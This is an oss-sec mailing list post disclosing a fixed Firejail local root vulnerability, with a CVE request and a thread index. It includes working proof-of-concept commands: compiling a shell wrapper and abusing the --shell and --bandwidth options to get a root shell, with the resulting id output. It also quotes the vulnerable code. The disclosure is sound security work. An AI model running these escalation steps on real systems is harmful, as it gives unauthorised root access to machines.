oss-sec mailing list archives
Re: Re: Firejail local root exploit
From: Martin Carpenter <mcarpenter () free fr>
Date: Sat, 07 Jan 2017 12:13:28 +0100
On Thu, 2017-01-05 at 23:37 +0100, Martin Carpenter wrote:
A handful of concrete examples that I have reported are below.
Another (new) one: MITRE can you please assign a CVE? 6. Root shell via --bandwidth and --shell Reported at: https://github.com/netblue30/firejail/issues/1023 Fixed at: commit 5d43fdcd215203868d440ffc42036f5f5ffc89fc Author: netblue30 <netblue30 () yahoo com> Date: Fri Jan 6 22:45:11 2017 -0500 security fix Quoting for list: ----8<---- [Against current HEAD, commit 64355] In a first window run: $ firejail --noprofile --name=x --net=eth0 In a second window, firstly create a dumb shell that ignores -c: $ echo 'int main() {system("/bin/sh");}' | gcc -xc -o dumbshell - and then secondly invoke that shell via the --shell and --bandwidth flags to obtain root: $ firejail --shell=./dumbshell --bandwidth=x status # id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),125(vboxusers),2000(wiki),10000(martin) context=system_u:system_r:initrc_t:s0 Error occurs at https://github.com/netblue30/firejail/blob/6435525696e8eda2d1bc0ef50488523422b9126d/src/firejail/bandwidth.c#L445-L451 char *arg[4]; arg[0] = cfg.shell; arg[1] = "-c"; arg[2] = cmd; arg[3] = NULL; clearenv(); execvp(arg[0], arg); I don't see any good reason to permit a user-specified shell to run a bandwidth command. ----8<----
Current thread:
- Re: Re: Firejail local root exploit, (continued)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 05)
- Re: Firejail local root exploit cve-assign (Jan 06)
- Re: Re: Firejail local root exploit sivmu (Jan 06)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 07)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 08)
- Re: Re: Firejail local root exploit Simon McVittie (Jan 08)
- Re: Re: Firejail local root exploit Brad Spengler (Jan 08)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 08)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 05)
- Re: Re: Firejail local root exploit Lizzie Dixon (Jan 06)
- Re: Firejail local root exploit cve-assign (Jan 07)
- Re: Re: Firejail local root exploit Martin Carpenter (Jan 07)
- Re: Firejail local root exploit cve-assign (Jan 07)
- Re: Firejail local root exploit cve-assign (Jan 06)
- Re: Re: Firejail local root exploit Thomas Deutschmann (Jan 31)